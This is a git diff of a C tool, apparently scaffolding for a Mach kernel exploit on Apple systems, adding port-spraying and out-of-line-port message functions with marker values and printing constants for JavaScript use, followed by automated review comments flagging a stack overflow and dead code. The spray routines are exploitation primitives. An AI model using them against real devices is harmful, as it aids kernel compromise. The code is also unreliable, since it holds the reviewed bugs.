Diffstat (limited to 'tools/testlol.c')
-rwxr-xr-xtools/testlol.c80
1 files changed, 75 insertions, 5 deletions
diff --git a/tools/testlol.c b/tools/testlol.c
index 59b1db9..526895b 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -46,6 +46,67 @@ typedef struct __attribute__((__packed__)) {
natural_t ip_sorights;
} kport_t;
+mach_port_t kp = 0;
+mach_port_t spray_ports(mach_msg_type_number_t number_port_descs) {
+ if (!kp) {
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &kp);
+ mach_port_insert_right(mach_task_self(), kp, kp, MACH_MSG_TYPE_MAKE_SEND);
+ }
+
+ mach_port_t mp = 0;
+
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &mp);
+ mach_port_insert_right(mach_task_self(), mp, mp, MACH_MSG_TYPE_MAKE_SEND);
+
+ send_ports(mp, kp, 2, number_port_descs);
+
+ printf("%x %x %x %x\n", mp, kp, 2, number_port_descs);
+
+ return mp;
+}
+
+kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, mach_msg_type_number_t number_port_descs)
+{
+ mach_port_t init_port_set[num];
+ for(size_t i = 0; i < num; ++i)
+ {
+ init_port_set[i] = payload;
+ }
+
+ typedef struct {
+ mach_msg_header_t Head;
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set[0];
+ } Request;
+
+ char buf[sizeof(Request) + number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t)];
+ Request *InP = (Request*)buf;
+
+ InP->msgh_body.msgh_descriptor_count = number_port_descs;
+ for (int i = 0; i < 2; i++) {
+ InP->init_port_set[i].address = (void *)0x41424344;
+ InP->init_port_set[i].count = 0x45464748;
+ InP->init_port_set[i].disposition = 0x53;
+ InP->init_port_set[i].deallocate = 0x51;
+ InP->init_port_set[i].type = 0x54;
+ }
+
+ InP->Head.msgh_bits = 0x494a4b4c;
+ /* msgh_size passed as argument */
+ InP->Head.msgh_remote_port = 0x4d4e4f50;
+ InP->Head.msgh_local_port = 0x51525354;
+ InP->Head.msgh_id = 0x55565758;
+
+ for (int i = 0; i < (sizeof(Request) + number_port_descs * sizeof(mach_msg_ool_ports_descriptor_t)); i++) {
+ printf("0x%02x,", ((uint8_t*)(buf))[i]);
+ }
+ printf("\n");
+
+ int ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("%d %s\n", ret, mach_error_string(ret));
+ return ret;
+}
+
int main(int argc, char* argv[]) {
printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
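Review bot: In send_ports the descriptor-fill loop `for (int i = 0; i < 2; i++)` is bounded by a literal 2 while `buf` is sized for `number_port_descs` descriptors, so a call with fewer than two descriptors writes past the end of the stack buffer. A call with more than two leaves the remaining descriptors as uninitialized stack bytes, which are then hex-dumped and handed to mach_msg. Bound the loop by the argument, `for (mach_msg_type_number_t i = 0; i < number_port_descs; i++)`, and clear the buffer first with `memset(buf, 0, sizeof buf);`. The local VLA `mach_port_t init_port_set[num]` is filled but never read, and the results of mach_port_allocate / mach_port_insert_right in spray_ports are discarded, so a failed allocation goes unnoticed. spray_ports also calls send_ports before its definition; unless a prototype exists outside this hunk, declare `kern_return_t send_ports(mach_port_t, mach_port_t, size_t, mach_msg_type_number_t);` above it.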
@@ -97,13 +158,22 @@ int main(int argc, char* argv[]) {
printf("var MIG_MAX = 0x%x\n", 0x1000);
printf("var NDR_record = %x %x %x %x\n", NDR_record);
- int number_port_descs = 1;
+// spray_ports(2);
- char buf[sizeof(Request) + number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t)];
- Request *InP = (Request*)buf;
+ printf("%x\n", MACH_RCV_MSG);
+
+/*
+ for (int i = 0; i < (sizeof(Request) + number_port_descs * sizeof(mach_msg_ool_ports_descriptor_t)); i++) {
+ printf("0x%02x,", ((uint8_t*)(buf))[i]);
+ }
+ printf("\n");
+
+ int ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);*/
+//
+// printf("%d %s\n", ret, mach_error_string(ret));
- printf("%p %p %x %x\n", buf, &InP->Head, sizeof(Request), sizeof(mach_msg_ool_ports_descriptor_t));
- printf("%x %x %x %x %x %x %x %x %x\n", &InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0x41414141);
+ // printf("%p %p %x %x\n", buf, &InP->Head, sizeof(Request), sizeof(mach_msg_ool_ports_descriptor_t));
+ // printf("%x %x %x %x %x %x %x %x %x\n", &InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0x41414141);
return 0;
}
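Review bot: The new side of main keeps the old dump loop and mach_msg call as commented-out blocks that still refer to `buf` and `number_port_descs`, whose declarations this same hunk removes, so the block cannot be re-enabled as written; deleting it and relying on version control would read better. `// spray_ports(2);` is commented out as well, which leaves the functions added earlier in this commit without a caller in the visible code. The added `printf("%x\n", MACH_RCV_MSG);` does not follow the `var NAME = 0x…` shape of the surrounding output lines; if that output is consumed as those lines suggest, `printf("var MACH_RCV_MSG = 0x%x;\n", MACH_RCV_MSG);` would match. main's body starts outside this hunk.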